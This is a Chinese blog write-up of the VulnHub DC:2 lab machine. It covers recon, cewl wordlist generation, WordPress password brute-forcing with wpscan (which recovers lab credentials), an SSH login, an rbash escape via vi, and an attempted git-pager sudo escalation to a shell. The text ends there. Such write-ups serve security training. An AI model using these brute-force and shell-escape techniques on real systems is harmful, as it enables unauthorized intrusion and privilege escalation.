[vulnhub] DC:2

First Post:

Last Update:

Word Count:
5.1k

Read Time:
29 min

blhx5th

简介

DC系列第二台靶机。主要知识点是cewl的使用以及rbash的逃出方法。总体来说还是比较轻松有意思的。

部署

部署完之后记得在攻击机上的/etc/hosts上加上一行<target-ip> dc-2,<target-ip>是靶机的ip,这样在网页自动跳转时才不会出错。

信息收集

主机发现,端口扫描,TCP扫描,服务探测,OS识别,脚本漏扫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24                            
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:16 CST
Nmap scan report for 192.168.56.1
Host is up (0.00019s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00015s latency).
MAC Address: 08:00:27:2E:A1:5A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.110
Host is up (0.00075s latency).
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.110
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:17 CST
Nmap scan report for 192.168.56.110
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p80,7744 192.168.56.110
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:17 CST
Nmap scan report for 192.168.56.110
Host is up (0.00097s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52517b6e70a4337ad24be10b5a0f9ed7 (DSA)
|   2048 5911d8af38518f41a744b32803809942 (RSA)
|   256 df181d7426cec14f6f2fc12654315191 (ECDSA)
|_  256 d9385f997c0d647e1d46f6e97cc63717 (ED25519)
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.68 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.110           
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 14:18 CST
Nmap scan report for 192.168.56.110
Host is up (0.00036s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 08:00:27:B4:BE:CB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.61 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo nikto -h http://192.168.56.110    
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.110
+ Target Hostname:    192.168.56.110
+ Target Port:        80
+ Start Time:         2023-05-28 14:20:25 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://dc-2/
+ /index.php?: Drupal Link header found with value: ARRAY(0x563ec3ea0920). See: https://www.drupal.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-05-28 14:21:56 (GMT8) (91 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

我们获取到的主要信息是ssh服务开在7744端口上,且脚本漏扫扫出来的目录结构显示网站明显就是基于wordpress搭建。

那wordpress是老熟人了,直接对症下药,用wpscan扫一扫呗。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo wpscan --url http://dc-2 -e   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Sun May 28 14:28:40 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:00 <==================> (500 / 500) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <================> (2575 / 2575) 100.00% Time: 00:00:03

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <=========================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:07 <==============> (100 / 100) 100.00% Time: 00:00:07

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <====================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun May 28 14:29:03 2023
[+] Requests Done: 3444
[+] Cached Requests: 9
[+] Data Sent: 884.313 KB
[+] Data Received: 1.063 MB
[+] Memory used: 285.43 MB
[+] Elapsed time: 00:00:23

可以发现扫描出来了三个用户: admin,jerry,tom

web渗透

在尝试登录wp后台前,我们先看看网页到底长啥样。

flag1

随便点点我们就找到了flag1。

flag1提示我们常规wordlist很可能不会起作用,告诉我们最好用cewl

cewl是基于ruby写的字典生成工具。既然他都这么说了,那我们就用用呗。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ cewl http://dc-2 -w dc-2.txt                             
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                                                                                       
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ cat dc-2.txt                
sit
amet
nec
quis
vel
orci
site
non
sed
vitae
luctus
........(太长了省略了)

生成了个238词的字典,我们拿它爆破一下admin账号的登录。如果能成功就最好了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo wpscan --url http://dc-2 -U 'admin' -P dc-2.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Sun May 28 14:33:45 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Trying admin / flag Time: 00:00:33 <==========================> (238 / 238) 100.00% Time: 00:00:33

[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun May 28 14:34:22 2023
[+] Requests Done: 379
[+] Cached Requests: 37
[+] Data Sent: 152.28 KB
[+] Data Received: 168.256 KB
[+] Memory used: 238.438 MB
[+] Elapsed time: 00:00:37

然而并没有成功,看来只能退而求其次,看看tom&jerry两兄弟能不能成功爆破出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ sudo wpscan --url http://dc-2 -U 'jerry,tom' -P dc-2.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Sun May 28 14:35:07 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - jerry / adipiscing                                                                    
[SUCCESS] - tom / parturient                                                                      
Trying tom / dis Time: 00:01:01 <=============                 > (410 / 886) 46.27%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun May 28 14:36:12 2023
[+] Requests Done: 550
[+] Cached Requests: 38
[+] Data Sent: 237.565 KB
[+] Data Received: 267.936 KB
[+] Memory used: 256.16 MB
[+] Elapsed time: 00:01:05

jerry:adipiscing;tom:parturient 猫和老鼠两兄弟凭证都成功爆破出来了。我们登录进去看看。发现在jerry账号下在pages里可以找到flag2。

flag2

他说如果利用不了wordpress就走别的路吧。

那我们肯定是不服气的,先看看wp有没有能利用的点吧。

我们最常用的admin账号下的plugin以及themes在当前两个用户下都没有。

那我们尝试一下文件上传呢:

media-upload-fail

发现没权限写。emmmmm,那就暂时没发现可以利用的地方了(也可能是遗漏一些我不知道的get shell方式)。

结合作者的提示和及时止损的原则,我们先试试别的路吧。

80端口暂时走不通,试试22,不对,应该是7744端口了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ ssh jerry@192.168.56.110 -p 7744
The authenticity of host '[192.168.56.110]:7744 ([192.168.56.110]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.110]:7744' (ED25519) to the list of known hosts.
jerry@192.168.56.110's password: 
Permission denied, please try again.
jerry@192.168.56.110's password: 

┌──(kali㉿kali)-[~/vulnhub/DC/2/workSpace]
└─$ ssh tom@192.168.56.110 -p 7744
tom@192.168.56.110's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

发现虽然jerry登不进去,但是tom可以登录。我们还是轻松获取到了立足点。

提权

然而不能高兴太早,登进来发现是个rbash也就是是个受限的shell。啥命令也没有,很难绷。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
tom@DC-2:~$ sudo -l
-rbash: sudo: command not found
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ which
-rbash: which: command not found
tom@DC-2:~$ python
-rbash: python: command not found
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ /bin/bash
-rbash: /bin/bash: restricted: cannot specify `/' in command names
tom@DC-2:~$ find
-rbash: find: command not found

一套连招下来就一个lspwd能用的,flag3在眼前看不了?

既然cat被ban了,那我们试试vi能不能看,发现竟然可以。

1
2
3
4
5
6
7
8
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
~                                                                     
~                                                                     
~                                                                     
~                                                                     
~                                                                     
~                                                                                                                                                   
"flag3.txt" 1 line, 95 characters

他说可怜的tom是时候使用su了。

然而可怜的tom的su命令也被扣掉了。这时候我们就去专业对口的gtfobins上找找有什么能逃出受限shell的方法。我们惊喜的发现vi就可以。这下能力越大责任越大了。

vi-escape

方法a显然不行,因为rbash此时限制了‘/’的使用,在上面我们试命令的时候就看得出来了。

那我们试试方法b,发现成功逃脱。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
tom@DC-2:~$ vi

$ whoami
/bin/sh: 1: whoami: not found
$ /bin/bash
tom@DC-2:~$ whoami
bash: whoami: command not found
tom@DC-2:~$ ls -la
total 40
drwxr-x--- 3 tom  tom  4096 May 28 03:11 .
drwxr-xr-x 4 root root 4096 Mar 21  2019 ..
-rwxr-x--- 1 tom  tom   336 May 28 03:11 .bash_history
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_login
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_logout
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bash_profile
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .bashrc
-rwxr-x--- 1 tom  tom    95 Mar 21  2019 flag3.txt
-rwxr-x--- 1 tom  tom    30 Mar 21  2019 .profile
drwxr-x--- 3 tom  tom  4096 Mar 21  2019 usr
tom@DC-2:~$ cat flag3.txt 
bash: cat: command not found
tom@DC-2:~$ echo $SHELL
/bin/rbash
tom@DC-2:~$ su jerry
bash: su: command not found
tom@DC-2:~$ cd usr
tom@DC-2:~/usr$ ls -la
total 12
drwxr-x--- 3 tom tom 4096 Mar 21  2019 .
drwxr-x--- 3 tom tom 4096 May 28 03:11 ..
drwxr-x--- 2 tom tom 4096 Mar 21  2019 bin
tom@DC-2:~/usr$ cd bin
tom@DC-2:~/usr/bin$ ls -la
total 8
drwxr-x--- 2 tom tom 4096 Mar 21  2019 .
drwxr-x--- 3 tom tom 4096 Mar 21  2019 ..
lrwxrwxrwx 1 tom tom   13 Mar 21  2019 less -> /usr/bin/less
lrwxrwxrwx 1 tom tom    7 Mar 21  2019 ls -> /bin/ls
lrwxrwxrwx 1 tom tom   12 Mar 21  2019 scp -> /usr/bin/scp
lrwxrwxrwx 1 tom tom   11 Mar 21  2019 vi -> /usr/bin/vi

发现还没完,虽然逃出来了,cd不受限制了,但是还是好多命令找不到,我们cd/home/tom/usr/bin目录下发现给我们只开了四个命令,难怪好多命令找不到。

那多半就是当前用户的$PATH设置的问题了,我们看看。

1
2
3
4
5
6
7
tom@DC-2:~/usr/bin$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~/usr/bin$ export PATH=/usr/bin:$PATH
tom@DC-2:~/usr/bin$ echo $PATH
/usr/bin:/home/tom/usr/bin
tom@DC-2:~/usr/bin$ cat
bash: cat: command not found

发现果然是$PATH的问题,我们加个/usr/bin,发现还是不行,算了直接从攻击机的环境变量拷贝一份过来算了。

1
2
3
4
5
6
7
8
9
10
11
12
13
tom@DC-2:/home/jerry$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/sbin:/bin:$PATH
tom@DC-2:/home/jerry$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/sbin:/bin:/usr/bin:/home/tom/usr/bin
tom@DC-2:/home/jerry$ which cat
/bin/cat
tom@DC-2:/home/jerry$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

发现命令都可以用了,并且我们也在jerry的目录下找到了flag4。

虽然傲娇作者表面上说No hints here - you're on your own now. :-),实际上还是给了提示:’Go on - git outta here!!!!’告诉我们用git

其实这块没细看也没关系,反正sudo -l的时候肯定能发现。

至于git怎么利用还是在gtfobins上就能找到:

git-privesca

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
tom@DC-2:/home/jerry$ sudo -l
[sudo] password for tom: 
Sorry, try again.
[sudo] password for tom: 
Sorry, user tom may not run sudo on DC-2.
tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ sudo PAGER='sh -c "exec sh 0<&1"' git -p help
sudo: sorry, you are not allowed to set the following environment variables: PAGER
jerry@DC-2:~$ sudo git -p help config
GIT-CONFIG(1)                        Git Manual                        GIT-CONFIG(1)


NAME
       git-config - Get and set repository or global options

SYNOPSIS
       git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
       git config [<file-option>] [type] --add name value
       git config [<file-option>] [type] --replace-all name value [value_regex]
       git config [<file-option>] [type] [-z|--null] --get name [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
       git config [<file-option>] --unset name [value_regex]
       git config [<file-option>] --unset-all name [value_regex]
